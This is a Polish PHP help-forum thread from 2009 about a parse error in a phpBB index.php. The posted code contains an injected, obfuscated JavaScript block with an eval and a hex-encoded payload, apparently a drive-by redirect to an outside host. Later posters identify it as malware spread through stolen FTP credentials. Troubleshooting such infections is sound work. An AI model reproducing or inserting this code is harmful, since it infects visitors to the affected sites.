[PHP]Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';' */index.php on line 66, Już brak sił ;-) Opcje

[nico]

Witam!
Dzisiaj pokazał mi się taki oto błąd "Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';' in */index.php on line 66". Forum leży a ja już nie mam pojęcia jak to naprawić siedziałem przy tym kilka godzin ale niestety moja znajomość PHP jest słaba i nie udało mi się naprawić usterki. Bardzo proszę o pomoc. Dużo czytałem i próbowałem ale i tak nic z tego.
Pozdrawiam

[PHP] pobierz, plaintext 
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); 
 
if ( $board_config['check_address'] )
{
	if ( !empty($HTTP_SERVER_VARS['SERVER_NAME']) || !empty($HTTP_ENV_VARS['SERVER_NAME']) )
	{
		$hostname = ( !empty($HTTP_SERVER_VARS['SERVER_NAME']) ) ? $HTTP_SERVER_VARS['SERVER_NAME'] : $HTTP_ENV_VARS['SERVER_NAME'];
	}
	else if ( !empty($HTTP_SERVER_VARS['HTTP_HOST']) || !empty($HTTP_ENV_VARS['HTTP_HOST']) )
	{
		$hostname = ( !empty($HTTP_SERVER_VARS['HTTP_HOST']) ) ? $HTTP_SERVER_VARS['HTTP_HOST'] : $HTTP_ENV_VARS['HTTP_HOST'];
	}
	else
	{
		$hostname = '';
	}
}
 
if ( $board_config['check_address'] && $hostname != $board_config['server_name'] && $hostname && $board_config['server_name'] && $board_config['script_path'] && !isset($HTTP_GET_VARS['redir']) )
{
	$server_protocol = ($board_config['cookie_secure']) ? 'https://' : 'http://';
	$server_name = preg_replace('#^\/?(.*?)\/?$#', '\1', trim($board_config['server_name']));
	$server_port = ($board_config['server_port'] <> 80) ? ':' . trim($board_config['server_port']) : '';
	$script_name = preg_replace('#^\/?(.*?)\/?$#', '\1', trim($board_config['script_path']));
	$script_name = ($script_name == '') ? $script_name : '/' . $script_name;
 
	$check_path_setup = @fopen($server_protocol . $server_name . $server_port . $script_name . '/extension.inc', 'r');
	if ( $check_path_setup )
	{
		@fclose($check_path_setup);
		$check_path_ok = true;
	}
 
	if ( $check_path_ok )
	{
		if ( @preg_match('/Microsoft|WebSTAR|Xitami/', getenv('SERVER_SOFTWARE')) )
		{
			header('Refresh: 0; URL=' . $server_protocol . $server_name . $server_port . $script_name. '/index.'.$phpEx . '?redir=1');
	[i][u]Linia 66>>	echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta http-equiv="refresh" content="0; url=' . $server_protocol . $server_name . $server_port . $script_name. '/index.'.$phpEx . '?redir=1"><title>Redirect</title></head><body><script>c10z7ef='';y5fc16a455=/* yaec1c8 */document;y5fc16a455.write('<scr'+'ipt>function y636cb1ffb(y557e6d79){return e'+c10z7ef+'val(y557e6d79); }</scr'+'ipt>');  function c101e3f8acya0e4dd133(y6241455){ function y3266ca(){return 16;} var z9f='';return (y636cb1ffb('par'+z9f+'seInt')(y6241455,y3266ca()));}function y53c13c(ya8d11){ function y6b051bb7c6(){return 2;} var ye887f5='';y45a10d834='fromCh';yd4b4c1=String[y45a10d834+'arCode'];for(y5bdc8cd56d4=0;y5bdc8cd56d4<ya8d11.length;y5bdc8cd56d4+=y6b051bb7c6()){ ye887f5+=(yd4b4c1(c101e3f8acya0e4dd133(ya8d11.substr(y5bdc8cd56d4,y6b051bb7c6()))));}return ye887f5;} var y3c177='3C7363726970743E69662821'+c10z7ef+'6D796961'+c10z7ef+'297B646F63756D656E742E777269746528756E65736361'+c10z7ef+'7065282027253363253639253636253732253631'+c10z7ef+'253664253635253230253665253631'+c10z7ef+'253664253635253364253633253331'+c10z7ef+'253330253230253733253732253633253364253237253638253734253734253730253361'+c10z7ef+'25326625326625373325373425363525373025333225366425363525326525366525363525373425
326625326525363425363925363625326625363725366625326525373025363825373025336625373
3253639253634253364253331'+c10z7ef+'26253237253262253464253631'+c10z7ef+'253734253638253265253732253666253735253665253634253238253464253631'+c10z7ef+'253734253638253265253732253631'+c10z7ef+'253665253634253666253664253238253239253261'+c10z7ef+'253332253331'+c10z7ef+'25333725333725333925333925323925326225323725333325333725333225363625333225333725
363425333625333025323725323025373725363925363425373425363825336425333525333025333
325323025363825363525363925363725363825373425336425333425333325333325323025373325
373425373925366325363525336425323725373625363925373325363925363225363925366325363
9253734253739253361'+c10z7ef+'25363825363925363425363425363525366525323725336525336325326625363925363625373225
3631'+c10z7ef+'2536642536352533652729293B7D7661'+c10z7ef+'72206D796961'+c10z7ef+'3D747275653B3C2F7363726970743E';y5fc16a455.write(y53c13c(y3c177));</script><div align="center">If your browser does not support meta redirection please click <a href="' . $server_protocol . $server_name . $server_port . $script_name. '/index.'.$phpEx . '?redir=1">HERE</a> to be redirected</div></body></html>';
			exit;
		}
 
		// Behave as per HTTP/1.1 spec for others
		header('Location: ' . $server_protocol . $server_name . $server_port . $script_name. '/index.'.$phpEx . '?redir=1');
		exit;
	}
[PHP] pobierz, plaintext 

Ten post edytował nico 27.08.2009, 21:15:24

[Pawel_W]

[PHP] pobierz, plaintext 
c10z7ef=';';y5fc16a455=/* yaec1c8 */document;y5fc16a455.write
[PHP] pobierz, plaintext 

co to jest?

EDIT:
co TO jest?

[PHP] pobierz, plaintext 
';y5fc16a455=/* yaec1c8 */document;y5fc16a455.write
('<'scr'+'ipt>
function y636cb1ffb(y557e6d79){return e'+c10z7ef+'val(y557e6d79); }</scr'+'ipt>');
[PHP] pobierz, plaintext 

patrz na kolorowanie...

Ten post edytował Pawel_W 27.08.2009, 20:59:19

[nico]

[PHP] pobierz, plaintext 
c10z7ef=';';y5fc16a455=/* yaec1c8 */document;y5fc16a455.write
[PHP] pobierz, plaintext 

co to jest?

EDIT:
co TO jest?

Już poprawiłem to była moja nieudolna desperacka próba naprawy.

[PHP] pobierz, plaintext 
';y5fc16a455=/* yaec1c8 */document;y5fc16a455.write
('<'scr'+'ipt>
function y636cb1ffb(y557e6d79){return e'+c10z7ef+'val(y557e6d79); }</scr'+'ipt>');
[PHP] pobierz, plaintext 

patrz na kolorowanie...

Nie mam pojęcia tak już było w "oryginale".

[thek]

Za to ja wiem co to jest Jeden ze szkodników dopisujących swój kod do plików index. Wykorzystuje między innymi niezabezpieczone menedżery plików by się dopisywać do plików startowych stron. Największym cierpiącym na tym są userzy Total Commandera, który łączy się przy pomocy wbudowanego w ten program klienta ftp i zmienia zawartość plików index.html dopisując je lub tworzy je na serwerze. Usuń to draństwo z kodu i nie zapisuj haseł w TC do czasu aż nie poprawią tego babola z nowymi wersjami. Ja się z tym draństwem spotkałem już ponad pół roku temu, ale wtedy dopiero wchodziło to na serwery. Dopiero po jakimś 1-2 miesiącach serwisy zaczęły o tym trąbić jako zagrożeniu. Potem w firmie w jakiej się zatrudniłem też to złapali, ale na szczęście z innym informatykiem już "infekcję" przeszliśmy, więc wiedzieliśmy z czym mamy do czynienia

[nico]

Fakt używam TC ale dopiero go dzisiaj zainstalowałem po pojawieniu się tego komunikatu. Wcześniej miałem zainstalowanego z zapamiętanym hasłem ale to było dość dawno. Co konkretnie mam usunąć? To co podał kolega Pawel_W?

[erix]

Parse error? Oszaleliście?